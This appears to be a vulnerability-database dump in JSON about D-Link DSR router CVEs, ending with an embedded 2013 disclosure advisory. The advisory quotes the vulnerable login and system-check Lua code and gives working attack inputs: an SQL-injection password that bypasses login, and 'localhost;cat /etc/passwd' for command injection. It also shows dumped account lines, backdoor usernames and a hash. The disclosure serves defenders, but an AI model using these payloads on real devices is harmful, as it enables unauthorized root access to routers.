      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Unauthenticated\u00a0\u0026\u00a0Authenticated\u00a0Command\u00a0Injection\u00a0Vulnerabilities",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "title": "Patch for D-Link DSR-250 command injection vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/242233"
      },
      {
        "title": "D-link DSR-250 Enter the fix for the verification error vulnerability",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=137680"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      },
      {
        "problemtype": "Incorrect input confirmation (CWE-20) [NVD Evaluation ]",
        "trust": 0.8
      },
      {
        "problemtype": "OS Command injection (CWE-78) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25759"
      },
      {
        "trust": 1.6,
        "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10195"
      },
      {
        "trust": 1.6,
        "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
      },
      {
        "trust": 1.6,
        "url": "https://www.dlink.com/en/security-bulletin"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "date": "2021-08-27T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "date": "2020-12-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      },
      {
        "date": "2020-12-15T20:15:16.307000",
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-21T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-72723"
      },
      {
        "date": "2021-08-27T07:31:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      },
      {
        "date": "2020-12-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      },
      {
        "date": "2024-11-21T05:18:41.377000",
        "db": "NVD",
        "id": "CVE-2020-25759"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DSR-250\u00a0 Input verification vulnerability in device",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014722"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-1105"
      }
    ],
    "trust": 0.6
  }
}

var-202102-0253
Vulnerability from variot

The UPnP service on the D-Link DSR-250 (3.14) and DSR-1000N (2.11B201) contains a command injection vulnerability, which can lead to remote command execution. The D-Link DSR-250 is a unified services router.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202102-0253",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.14"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.11b201"
      },
      {
        "model": "dsr-250 dsr-1000n",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "(3.14)"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "cve": "CVE-2020-18568",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2020-18568",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2021-12665",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2020-18568",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-18568",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2021-12665",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202102-192",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-18568",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-18568"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The D-Link DSR-250 (3.14) DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution. D-link DSR-250 is a unified service router",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-18568"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-18568"
      }
    ],
    "trust": 1.53
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-18568",
        "trust": 2.3
      },
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-192",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-18568",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-18568"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "id": "VAR-202102-0253",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      }
    ]
  },
  "last_update_date": "2024-11-23T23:01:08.971000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Vulnerability",
        "trust": 0.1,
        "url": "https://github.com/tzwlhack/Vulnerability "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "https://gist.github.com/winmin/5b2bc43b517503472bb28a298981ed5a"
      },
      {
        "trust": 1.7,
        "url": "https://www.dlink.com/en/security-bulletin/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-18568"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/78.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/tzwlhack/vulnerability"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-18568"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-18568"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-02-26T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "date": "2021-02-02T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-18568"
      },
      {
        "date": "2021-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      },
      {
        "date": "2021-02-02T14:15:11.327000",
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-02-26T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      },
      {
        "date": "2021-07-21T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-18568"
      },
      {
        "date": "2021-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      },
      {
        "date": "2024-11-21T05:08:39.290000",
        "db": "NVD",
        "id": "CVE-2020-18568"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-link DSR-250 UPnP service command injection vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2021-12665"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "command injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202102-192"
      }
    ],
    "trust": 0.6
  }
}

var-202002-0660
Vulnerability from variot

Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. Multiple D-Link products have an SQL injection vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). D-Link DSR is a wireless service router product. Successful exploitation of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. The D-Link DSR Router Series is prone to an SQL-injection vulnerability.

CVEs:

CVE-2013-5945 - Authentication Bypass by SQL-Injection

CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution

Vulnerable Routers:

D-Link DSR-150 (Firmware < v1.08B44)

D-Link DSR-150N (Firmware < v1.05B64)

D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)

D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)

D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)

Download URL:

http://tsd.dlink.com.tw

Arch:

mips and armv6l, Linux

Author:

0_o -- null_null

nu11.nu11 [at] yahoo.com

Date:

2013-08-18

Purpose:

Get a non-persistent root shell on your D-Link DSR.

Prerequisites:

Network access to the router ports 443 and 23.

!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!

A list of identified vulns follows. This list is not exhaustive as I assume

more vulns are present that just slipped my attention.

The fact that D-Link implemented a backdoor user (for what reason, please??)

and just renamed it instead of completely removing it after it was targeted

by my previous exploit, as well as the triviality of those vulns I found

makes me suggest that more vulns are present that are comparably easy to

exploit.

Since 2013-12-03, patches are available for:

DSR-150: Firmware v1.08B44

DSR-150N: Firmware v1.05B64

DSR-250 and DSR-250N: Firmware v1.08B44

DSR-500 and DSR-500N: Firmware v1.08B77

DSR-1000 and DSR-1000N: Firmware v1.08B77

via http://tsd.dlink.com.tw

And now, have a worthwhile read :-)

Contents:

  1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)
  2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)
  3. Exposure: D-Link backdoor user
  4. Vulnerability: Use of weak hash algorithms
  5. Exposure: Passwords are stored as plain text in config files
  6. Vulnerability: Bad permissions on /etc/shadow

1. Vulnerability: Authentication Bypass by SQL-Injection (CVE-2013-5945)

  • Possible via the global webUI login form.

  • File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:

-- Checks a submitted username/password pair against a row in `tablename`.
-- Returns two values: a boolean (true when the query fetched a row) and a
-- status code string: "NONE", or "USER_LOGIN_INVALID_PASSWORD" when the query
-- ran but fetched no row.
-- NOTE(review): both credentials are read from the input table (per the
-- advisory, the webUI login form) and spliced into the SQL text with
-- string.format, with no escaping and no bound parameters. A quote character
-- in either field therefore changes the structure of the WHERE clause; this
-- is the root cause of CVE-2013-5945. The remedy is to pass the values as
-- bound parameters (or, failing that, to escape them) instead of formatting
-- them into the statement.
-- NOTE(review): the submitted password is compared directly with the stored
-- "Password" column, which is consistent with the plain-text password storage
-- this advisory reports for the config file -- confirm against the schema.
function login.authenticate(tablename, tableInput)
  local username = tableInput["Users.UserName"]
  local password = tableInput["Users.Password"]
  -- The whole statement, including user-supplied values, is built as one string.
  local cur = db.execute(string.format([[ SELECT *, ROWID AS ROWID FROM %s WHERE %s = '%s' AND %s = '%s' ]], tablename, "UserName", username, "Password", password))
  local result = false
  local statusCode = "NONE"
  -- When db.execute yields no cursor, the function returns (false, "NONE").
  if cur then
    local row = cur:fetch({}, "a")
    cur:close()
    -- Any fetched row counts as a successful login; the row's contents are not inspected.
    result = row ~= nil
    if result == false then
      statusCode = "USER_LOGIN_INVALID_PASSWORD"
    end
  end
  return result, statusCode
end

  • This function creates an SQL statement of the form:

SELECT * FROM "Users" WHERE "UserName" = 'user' AND "Password" = 'pass';

  • Since there is a default admin user account called "admin" around, this is easily exploitable by providing this to the login form:

username = admin password = ' or 'a'='a

  • ...resulting in this SQL statement:

SELECT * FROM "Users" WHERE "UserName" = 'admin' AND "Password" = '' or 'a'='a';

  • Old school SQL injection. Ohh, by the way...

  • The same fault can be found in captivePortal.lua -- FREE NETWORKS FOR EVERYONE --

2. Vulnerability: Privilege Escalation by Arbitrary Command Execution (CVE-2013-5946)

  • Possible from the Tools --> System Check page.

  • File /pfrm2.0/var/www/systemCheck.htm contains:

-- Runs `command` through io.popen with stderr merged into stdout and returns
-- everything the process printed.
-- NOTE(review): io.popen hands the whole string to the system shell, and
-- nothing in this helper validates or quotes `command`; every caller is
-- responsible for what ends up in it.
local function runShellCmd(command)
    local pipe = io.popen(command .. " 2>&1") -- redirect stderr to stdout
    local cmdOutput = pipe:read("*a")
    pipe:close()
    return cmdOutput
end
-- Dispatch on the submitted button type; "[...]" marks lines the advisory elided.
-- NOTE(review): in all three branches a form value (ipToPing, ipToTraceRoute,
-- internetNameToNsLookup) is concatenated into a shell command line. The
-- advisory states the only input checks are client-side "onclick" JavaScript,
-- so the server must validate these values itself (strict IP address /
-- hostname pattern) and should invoke the tools without a shell, or with the
-- argument quoted. This is the root cause of CVE-2013-5946.
if (ButtonType and ButtonType == "ping") then
[...]
    local cmd_ping = pingprog .. " " .. ipToPing .. " " .. options1 .. " > " .. pingfile
    globalCmdOutput = runShellCmd (cmd_ping)
    statusMessage = "Pinging " .. ipToPing
[...]
elseif (ButtonType and ButtonType == "traceroute") then
[...]
    local cmd = traceRouteProg .. " " .. ipToTraceRoute .. options
    globalCmdOutput = runShellCmd(cmd)
    statusMessage = "Traceroute To " .. ipToTraceRoute .. "..."
[...]
elseif (ButtonType and ButtonType == "dnslookup") then
[...]
    -- This branch bypasses runShellCmd and calls os.execute directly on the
    -- concatenated string; the same missing validation applies.
    util.appendDebugOut("Exec = " .. os.execute(nsLookupProg .. " " .. internetNameToNsLookup .. " > " .. nsLookupFile))
    statusMessage = "DNS Lookup for " .. internetNameToNsLookup
[...]

  • Command injection is possible in at least these form sections:

Ping or Trace an IP Address
Perform a DNS Lookup

  • When using a browser, deactivate the "onclick" JavaScript checks using a tool like Firebug. Tools like curl are not hindered by these checks.

  • All forms allow input like this:

localhost;<command>

example:

localhost;cat /etc/passwd

  • This user provided value is then directly used as part of the input for the call to runShellCmd(c) and thus io.popen(c) in the first form section and os.execute(c) in the second form section.

  • Output from user provided commands gets displayed on the next page beneath the benign command output.

example:

[...]
<textarea rows="15" name="S1" cols="60" wrap="off" class="txtbox1">
traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets
 1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms
root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
</textarea>
[...]

3. Exposure: D-Link backdoor user:

  • This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:

root:!:0:0:root:/root:/bin/sh
gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh

  • You can see the old D-Link backdoor user name "ZX4q9Q9JUpwTZuo7". That was the account I hacked before with my previous exploit: http://www.exploit-db.com/papers/22930/ And there is a new backdoor user "gkJ9232xXyruTRmY" introduced. Instead of removing the backdoor, D-Link just created a new one.

  • I verified this by showing the /etc/profile:

# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "gkJ9232xXyruTRmY" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '

4. Vulnerability: Use of weak hash algorithms:

  • In the /etc/shadow, salted DES hashes are used to store user passwords. Since this hash type supports at most 8 characters, users can log in by just typing the first 8 letters of their passwords when using SSH or telnet.

  • An effective password length limitation of 8 characters makes brute force attacks on user accounts very feasible, even if the user chose a longer password.

5. Exposure: Passwords are stored as plain text in config files:

  • A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the /tmp/system.db is built on boot time, reveals that all user passwords are stored in plain text.

Example:

[...]
Users = {}
Users[1] = {}
Users[1]["Capabilities"] = ""
Users[1]["DefaultUser"] = "1"
Users[1]["UserId"] = "1"
Users[1]["FirstName"] = "backdoor"
Users[1]["OID"] = "0"
Users[1]["GroupId"] = "1"
Users[1]["UserName"] = "gkJ9232xXyruTRmY"
Users[1]["Password"] = "thisobviouslyisafakepass"
Users[1]["UserTimeOut"] = "10"
Users[1]["_ROWID_"] = "1"
Users[1]["LastName"] = "ssl"
[...]

6. Vulnerability: Bad permissions on /etc/shadow

  • This file should have 600 permissions set and not 644. It is world readable. Pointless, since every process runs as root, no user separation is done anyway.

DSR-250N> ls -l -a /etc/shadow
-rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow
DSR-250N> ps
  PID USER       VSZ STAT COMMAND
    1 root      2700 S    init
    2 root         0 SW<  [kthreadd]
    3 root         0 SW<  [ksoftirqd/0]
    4 root         0 SW<  [events/0]
    5 root         0 SW<  [khelper]
    8 root         0 SW<  [async/mgr]
  111 root         0 SW<  [kblockd/0]
  120 root         0 SW<  [khubd]
  123 root         0 SW<  [kseriod]
  128 root         0 SW<  [kslowd]
  129 root         0 SW<  [kslowd]
  150 root         0 SW   [pdflush]
  151 root         0 SW   [pdflush]
  152 root         0 SW<  [kswapd0]
  200 root         0 SW<  [aio/0]
  210 root         0 SW<  [nfsiod]
  220 root         0 SW<  [crypto/0]
  230 root         0 SW<  [cns3xxx_spi.0]
  781 root         0 SW<  [mtdblockd]
  860 root         0 SW<  [usbhid_resumer]
  874 root         0 SW<  [rpciod/0]
  903 root         0 SWN  [jffs2_gcd_mtd4]
  909 root         0 SWN  [jffs2_gcd_mtd5]
  918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R
  999 root      1816 S <  /pfrm2.0/udev/sbin/udevd --daemon
 1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db
 1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db
 1049 root      2704 S    /usr/sbin/telnetd -l /bin/login
 1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd
 1141 root     37000 S    /pfrm2.0/bin/sshd
 1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5
 1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db
